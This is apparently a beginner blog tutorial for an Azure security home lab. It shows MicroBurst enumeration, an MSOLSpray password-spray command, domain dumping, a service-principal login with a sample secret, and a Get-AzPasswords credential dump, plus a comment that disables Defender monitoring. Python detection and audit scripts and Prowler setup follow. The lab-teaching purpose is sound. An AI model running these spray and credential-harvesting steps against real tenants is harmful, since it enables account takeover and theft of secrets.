Getting Started with Microsoft Azure Security: Attacking and Auditing
This blog post summarizes beginner-friendly ways to get hands-on with Microsoft Azure Security. It compiles useful resources for upskilling, including creating a home lab, practicing attacks and audits, and preparing for relevant certifications.
As innovation increasingly relies on cloud technologies, securing these environments becomes vital for maintaining customer trust and encouraging investment. Microsoft Azure stands out as one of the leading public cloud platforms, making Azure Security skills highly sought-after and widely valued.
When considering a career in Microsoft Azure Security, understanding the salary landscape can help set expectations and inspire skill development. Based on European market data from January 2025, the average base salary for Microsoft Azure skills in Spain is €45k/year. Key skills include identity management, incident response, infrastructure as code, and cloud security architecture.
For more precise results, search for "Azure Security" on LinkedIn filtered to a specific country, check out other job salary research tools, and explore Microsoft Security Partner job boards.
Lab Setup:
This post introduces a lab focused on attacking and auditing Azure, serving as the first in a Cloud Security series of posts. Rather than covering all tools and techniques, it highlights a selection of sample open-source tools. It’s not a comprehensive step-by-step guide but a collection of notes designed to help you get started with hands-on Azure Security as quickly as possible, along with guidance to continue your individual exploration.
To set up an Azure lab with temporary infrastructure and identities, you can use an environment of your choice or refer to the following resources (my own picks :) ):
- Infosec Skills Cloud Pentesting Project [7-day trial available]
- SANS Pen Test Austin 2023: Workshop - Building Azure Security Labs using Terraform
Image 01: SANS workshop detail:
Additional learning resources with Terraform samples are listed at the bottom of the blog.
If creating a lab from scratch, you’ll need:
- An Azure subscription:
Sign up at https://portal.azure.com, activate your subscription, and enable MFA to secure your account.
- A VM with the Azure CLI tool, Git, Docker Engine with docker compose, and Terraform installed.
- Install the PowerShell module dependencies: Az, MSOnline (MSOL), and AzureAD.
Then, clone and import MicroBurst:
Image 02: Welcome to Azure dashboard, Choose your Subscription, activate MFA detail:
Attacks:
1. Anonymous Attacks:
Using MicroBurst, a PowerShell tool by NetSPI for pentesting Azure resources:
```powershell
cd C:\Tools
git clone "https://github.com/NetSPI/MicroBurst"
cd .\MicroBurst
Import-Module .\MicroBurst.psm1 2>$null
Invoke-EnumerateAzureSubDomains -Base ncaa -Verbose
Invoke-EnumerateAzureBlobs -Base staticsite
```
Image 03: Install missing AZ, import MicroBurst, MicroBurst Enumerate:
2. Finding Azure Credentials:
Conducting a Password Spray Attack using MSOLSpray:
- Clone the tool and prepare the environment:
```bash
#[when running MSOLSpray on Windows add: Set-MpPreference -DisableRealtimeMonitoring $true ]
mkdir -p ~/Tools
cd ~/Tools
rm -rf MSOLSpray
git clone https://github.com/dafthack/MSOLSpray
cd MSOLSpray
az ad user list --query "[].userPrincipalName" -o tsv > users.txt
```
```powershell
#[az logout]
Import-Module ./MSOLSpray.ps1
Invoke-MSOLSpray -UserList ./users.txt -Password 'DunderMifflin123$'
#[There's a match, we have FoundUser1 and FoundUser2! login as the user FoundUser1]
#exit
```
Image 04: MSOLSpray detail:
Keep in mind that starting 10/15/2024, all users must use MFA to access the Azure portal.
As we'll explore shortly, you'll have better chances of bypassing this requirement by using methods like Service Principal credentials, where MFA is not yet enforced.
Image 05: Azure Mandatory MFA detail:
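What the spray above looks like from the tenant's side, as an added example that is not part of the original post or of MSOLSpray: a small detector over constructed Entra ID sign-in records that flags one source address failing against many distinct accounts inside a short window, and lists the accounts whose password that address then got accepted. The record fields (userPrincipalName, ipAddress, createdDateTime, status.errorCode) and the result codes 50126 and 50076 are my assumptions about the SigninLogs schema; map them to the columns your SIEM exposes.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Entra ID sign-in result codes used below (assumption: verify against your logs)
INVALID_PASSWORD = 50126   # AADSTS50126: invalid username or password
MFA_REQUIRED = 50076       # AADSTS50076: password accepted, MFA challenge still required
SUCCESS = 0                # sign-in completed

SPRAY_IP = "203.0.113.10"  # constructed source address (TEST-NET-3 range)


def _rec(ts, upn, ip, code):
    """Build one constructed sign-in record in the Entra SigninLogs shape."""
    return {"createdDateTime": ts, "userPrincipalName": upn,
            "ipAddress": ip, "status": {"errorCode": code}}


# Constructed sample: one address tries a single password against eight
# accounts in a few minutes; two accept it (one of them is then held at MFA).
# The other records are normal activity, including a user mistyping twice.
SAMPLE_SIGNINS = [
    _rec("2025-01-20T08:00:00Z", "pvance@contoso.example", "198.51.100.20", SUCCESS),
    _rec("2025-01-20T09:30:00Z", "jhalpert@contoso.example", "198.51.100.7", INVALID_PASSWORD),
    _rec("2025-01-20T09:30:20Z", "jhalpert@contoso.example", "198.51.100.7", INVALID_PASSWORD),
    _rec("2025-01-20T09:31:00Z", "jhalpert@contoso.example", "198.51.100.7", SUCCESS),
    _rec("2025-01-20T10:00:05Z", "abernard@contoso.example", SPRAY_IP, INVALID_PASSWORD),
    _rec("2025-01-20T10:00:35Z", "dschrute@contoso.example", SPRAY_IP, INVALID_PASSWORD),
    _rec("2025-01-20T10:01:05Z", "jhalpert@contoso.example", SPRAY_IP, INVALID_PASSWORD),
    _rec("2025-01-20T10:01:35Z", "kmalone@contoso.example", SPRAY_IP, INVALID_PASSWORD),
    _rec("2025-01-20T10:02:05Z", "mscott@contoso.example", SPRAY_IP, MFA_REQUIRED),
    _rec("2025-01-20T10:02:35Z", "pbeesly@contoso.example", SPRAY_IP, INVALID_PASSWORD),
    _rec("2025-01-20T10:03:05Z", "pvance@contoso.example", SPRAY_IP, SUCCESS),
    _rec("2025-01-20T10:03:35Z", "shudson@contoso.example", SPRAY_IP, INVALID_PASSWORD),
]


def _parse(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")


def detect_password_spray(events, window_minutes=60, min_users=5):
    """One finding per source IP that failed against >= min_users distinct
    accounts inside any window_minutes window. The finding also lists the
    accounts whose password that IP got accepted in the same window, which is
    the "FoundUser" outcome a spray tool reports."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ipAddress"]].append(e)

    window = timedelta(minutes=window_minutes)
    findings = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: _parse(e["createdDateTime"]))
        best = None  # (failed users, accepted users, window start) with most failed users
        for i, start in enumerate(evs):
            t0 = _parse(start["createdDateTime"])
            in_win = [e for e in evs[i:] if _parse(e["createdDateTime"]) - t0 <= window]
            failed = {e["userPrincipalName"] for e in in_win
                      if e["status"]["errorCode"] == INVALID_PASSWORD}
            accepted = {e["userPrincipalName"] for e in in_win
                        if e["status"]["errorCode"] in (SUCCESS, MFA_REQUIRED)}
            if best is None or len(failed) > len(best[0]):
                best = (failed, accepted, start["createdDateTime"])
        failed, accepted, first_seen = best
        if len(failed) >= min_users:
            findings.append({"ip": ip, "first_seen": first_seen,
                             "distinct_failed_users": len(failed),
                             "compromised": sorted(accepted)})
    return findings


if __name__ == "__main__":
    for f in detect_password_spray(SAMPLE_SIGNINS):
        print(f)
```

The mandatory MFA mentioned above does not hide a correct guess: a valid password that is then stopped at the MFA prompt is logged as 50076 rather than 50126, so the spray is visible, and the accounts listed under `compromised` still need a password reset even though the portal login was blocked.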
3. Privileged Attacks:
Authenticated as FoundUser1, who holds privileged admin credentials, we can:
- Dump domain information using MicroBurst:
```powershell
cd C:\Tools\MicroBurst
pwsh
Import-Module .\MicroBurst.psm1 2>$null
Connect-AzAccount
Connect-AzureAD
# Add domain exceptions in case of any browser errors, and once you are authenticated, run the following commands:
cd ~\Desktop
Get-AzDomainInfo -Verbose
cd Az
start .
```
Image 06: Dumped Azure database detail 1:
Depending on the privileges the user has, more or less data will be dumped. We can confirm this by reviewing the user's details and assigned roles in the dashboard. Here's how it looks if we dump the data with the highest privileged user:
Image 07: Dumped Azure database detail 2:
4. Credential Escalation:
Using compromised FoundUser2 credentials:
- Log in, explore, try to find credentials in cleartext:
```bash
# [let's now logout MScott, and az-login as the other user we found with password spraying: https://learn.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest#az-login ]
#az logout
az login --use-device-code
# [insert FoundUser1 PVance' email address and the valid password, DunderMifflin123$ ]
# In case PVance user can get to cleartext credentials from for example, the Azure Container Registry, their Reader role has access to:
# sp_contributor_user=g7ng36726-8a72-0483-1802-974919640e8e
# sp_contributor_pass=m.O6Q~CqiUTNcghtyuFR.txNdMMRwoxsGthT~aYJ
# now authenticate as that Service Principal:
#https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference
tenant="$(az account show --query 'tenantId' -o tsv)"
az logout
az login --service-principal -u "$sp_contributor_user" -p "$sp_contributor_pass" --tenant "$tenant"
# with that we could escalate PVance's privileges and now as a Contributor, we could for example proceed with
```
```powershell
Get-AzPasswords -ModifyPolicies Y -Verbose | Export-Csv -NoTypeInformation .\credentials.csv
```
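The escalation above needed two conditions to hold at once: a Service Principal holding Contributor at subscription scope, and that principal authenticating with a long-lived password secret that could be copied out of a registry or config. An audit that checks both, as an added example (not from the original post, MicroBurst or the Azure CLI): the records are constructed and shaped like the JSON that `az role assignment list --all -o json` and `az ad app credential list` return as I know it (principalType, roleDefinitionName, scope; keyId, startDateTime, endDateTime), which is an assumption to verify against your own CLI output.

```python
import re
from datetime import datetime, timezone

PRIVILEGED_ROLES = {"Owner", "Contributor", "User Access Administrator"}

# A scope is "broad" when it is the tenant root, a management group or a whole
# subscription, i.e. not narrowed to a resource group or a single resource.
BROAD_SCOPE = re.compile(
    r"^(/|/providers/Microsoft\.Management/managementGroups/[^/]+|/subscriptions/[^/]+)$")

SUB = "/subscriptions/00000000-0000-0000-0000-000000000000"  # placeholder subscription id
AUDIT_DATE = datetime(2025, 1, 20, tzinfo=timezone.utc)        # fixed "now" for the sample

# Constructed records in the shape of `az role assignment list --all -o json`
# (field names are an assumption; check them against your own output).
ROLE_ASSIGNMENTS = [
    {"principalName": "pvance@contoso.example", "principalType": "User",
     "roleDefinitionName": "Reader", "scope": SUB},
    {"principalName": "mscott@contoso.example", "principalType": "User",
     "roleDefinitionName": "Owner", "scope": SUB},
    {"principalName": "sp-build-contributor", "principalType": "ServicePrincipal",
     "roleDefinitionName": "Contributor", "scope": SUB},
    {"principalName": "sp-webapp-deploy", "principalType": "ServicePrincipal",
     "roleDefinitionName": "Contributor", "scope": SUB + "/resourceGroups/rg-web"},
]

# Constructed password credentials per principal, shaped like the
# passwordCredentials entries of `az ad app credential list` (same caveat).
PASSWORD_CREDENTIALS = {
    "sp-build-contributor": [
        {"keyId": "aaaaaaaa-0000-0000-0000-000000000001", "displayName": "ci-secret",
         "startDateTime": "2023-01-01T00:00:00Z", "endDateTime": "2025-01-01T00:00:00Z"},
    ],
    "sp-webapp-deploy": [],  # certificate or federated credential only, nothing to copy
}


def _parse(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def find_privileged_service_principals(assignments):
    """Service principals holding a privileged role at subscription or wider scope."""
    return sorted({a["principalName"] for a in assignments
                   if a["principalType"] == "ServicePrincipal"
                   and a["roleDefinitionName"] in PRIVILEGED_ROLES
                   and BROAD_SCOPE.match(a["scope"])})


def secret_findings(principal, creds, now, max_lifetime_days=90):
    """Flag password secrets whose validity period exceeds policy or has lapsed."""
    out = []
    for c in creds:
        end = _parse(c["endDateTime"])
        lifetime = (end - _parse(c["startDateTime"])).days
        if lifetime > max_lifetime_days:
            out.append({"principal": principal, "keyId": c["keyId"],
                        "issue": "secret_lifetime_exceeds_policy", "days": lifetime})
        if end < now:
            out.append({"principal": principal, "keyId": c["keyId"],
                        "issue": "secret_expired", "days": lifetime})
    return out


def audit(assignments, creds_by_principal, now=None):
    """Report privileged, broadly scoped service principals that rely on password secrets."""
    now = now or datetime.now(timezone.utc)
    report = []
    for sp in find_privileged_service_principals(assignments):
        creds = creds_by_principal.get(sp, [])
        if not creds:
            continue  # no copyable secret: certificate or workload identity federation
        report.append({"principal": sp, "keyId": None,
                       "issue": "password_secret_on_privileged_sp", "days": None})
        report.extend(secret_findings(sp, creds, now))
    return report


if __name__ == "__main__":
    for r in audit(ROLE_ASSIGNMENTS, PASSWORD_CREDENTIALS, AUDIT_DATE):
        print(r)
```

`sp-webapp-deploy` holds the same Contributor role but is not reported: its scope is one resource group and it has no password secret, which is the shape to aim for (certificate or federated credential, least scope) for any principal that is outside the MFA requirement discussed earlier.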
Audit:
1a. Using Prowler CLI:
Install and run Prowler from Azure CloudShell:
- See Prowler CLI documentation for Azure CloudShell
- Download full report files and review:
Image 08: Install Prowler CLI detail:
Image 09: Obtain Prowler CLI reports detail:
In the table here you can find Prowler's syntax for available Azure services, frameworks and categories.
Also, see Tutorials Docs for a list of available compliance frameworks.
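Once the report files are downloaded, a small triage script saves scrolling through the CSV by hand. The following is an added example (not Prowler's own code) that counts FAIL results by severity and service and lists the most severe failures first. The excerpt is constructed: the column names (CHECK_ID, SERVICE_NAME, STATUS, SEVERITY, RESOURCE_UID), the semicolon delimiter and the check ids are my assumptions about the file layout, so compare them with the header line of the report you downloaded before relying on the script.

```python
import csv
import io
from collections import Counter

# Constructed excerpt in the layout I expect from Prowler's CSV report
# (semicolon-separated, upper-case header). CHECK_ID values are made up for
# the example and are not Prowler's real check names.
SAMPLE_CSV = """\
CHECK_ID;CHECK_TITLE;SERVICE_NAME;STATUS;SEVERITY;RESOURCE_UID
check_mfa_all_users;All users have MFA enabled;entra;FAIL;critical;user:pvance@contoso.example
check_blob_public_access;Blob public access disabled;storage;FAIL;high;/subscriptions/SUB_ID_PLACEHOLDER/resourceGroups/rg-lab/providers/Microsoft.Storage/storageAccounts/stlab01
check_blob_public_access;Blob public access disabled;storage;PASS;high;/subscriptions/SUB_ID_PLACEHOLDER/resourceGroups/rg-lab/providers/Microsoft.Storage/storageAccounts/stlab02
check_keyvault_soft_delete;Key Vault soft delete enabled;keyvault;FAIL;medium;/subscriptions/SUB_ID_PLACEHOLDER/resourceGroups/rg-lab/providers/Microsoft.KeyVault/vaults/kv-lab
"""

SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3, "informational": 4}


def load_findings(text, delimiter=";"):
    """Parse report text into one dict per row, keyed by the header names."""
    return list(csv.DictReader(io.StringIO(text), delimiter=delimiter))


def summarize(rows):
    """Count FAIL results overall, by severity and by service."""
    failed = [r for r in rows if r["STATUS"].upper() == "FAIL"]
    return {
        "total": len(rows),
        "failed": len(failed),
        "by_severity": dict(Counter(r["SEVERITY"].lower() for r in failed)),
        "by_service": dict(Counter(r["SERVICE_NAME"].lower() for r in failed)),
    }


def prioritize(rows, min_severity="high"):
    """Failed findings at min_severity or worse, most severe first (stable order otherwise)."""
    cutoff = SEVERITY_RANK[min_severity]
    hits = [r for r in rows if r["STATUS"].upper() == "FAIL"
            and SEVERITY_RANK.get(r["SEVERITY"].lower(), 99) <= cutoff]
    return sorted(hits, key=lambda r: SEVERITY_RANK[r["SEVERITY"].lower()])


if __name__ == "__main__":
    rows = load_findings(SAMPLE_CSV)
    print(summarize(rows))
    for r in prioritize(rows):
        print(r["SEVERITY"], r["CHECK_ID"], r["RESOURCE_UID"])
```

To run it against a real report, read the downloaded file with `open(path).read()` in place of `SAMPLE_CSV` and adjust `delimiter` if the header line shows commas instead of semicolons.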
1b. Using Prowler App:
I installed Prowler App on Kali Linux 2024.4:
- First, as a prerequisite, install Docker Engine with docker compose:
```bash
for pkg in docker.io docker-doc docker-compose podman-docker containerd runc; do sudo apt-get remove $pkg; done
sudo apt-get update
sudo apt-get install ca-certificates curl
sudo install -m 0755 -d /etc/apt/keyrings
sudo curl -fsSL https://download.docker.com/linux/debian/gpg -o /etc/apt/keyrings/docker.asc
sudo chmod a+r /etc/apt/keyrings/docker.asc
echo "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.asc] https://download.docker.com/linux/debian bookworm stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
# refresh the package index so apt sees the newly added Docker repository
sudo apt-get update
sudo apt-get install docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin
#[just to verify it works:]
#sudo docker run hello-world
```
```bash
curl -LO https://raw.githubusercontent.com/prowler-cloud/prowler/refs/heads/master/docker-compose.yml
curl -LO https://raw.githubusercontent.com/prowler-cloud/prowler/refs/heads/master/.env
docker compose up -d
```
Image 10: Install Prowler App detail (it could take some time depending on your internet connection; expect 5+ minutes):
Sign up locally, sign in, configure scanner, trigger a scan, and review results:
Image 11: Configure Prowler App and scan:
That wraps up this post!
From here, you can dive into the attached learning resources and continue your exploration:
Learning Resources:
1. Official Microsoft Resources:
- Security Virtual Training Days
- Certification Learning Paths
- Terraform samples for Azure
- Career Paths
- Azure operational security checklist
2. Additional Non-Microsoft Resources:
- PurpleCloud Network Azure labs: Installation + Labs Generators
- SANS Aviata: Making the Switch to Azure Monitor Agent Workshop + Chapter 6 Manual
- Introduction To Azure Penetration Testing by Nikhil Mittal (Altered Security)
- SANS Quick Wins in Cloud Compliance: Azure Webinar + Website
- Black Hills Information Security Webcast: Getting Started in Pentesting The Cloud: Azure
- Black Hills Information Security Webcast Reconnaissance: Azure Cloud w/ Kevin Klingbile
- Terraform for Azure tutorial
- INE AzureGoat attack and defense manuals
- Cloud Academy (QA training) - Azure Security hands-on labs
- Pwned Labs - Azure Security hands-on labs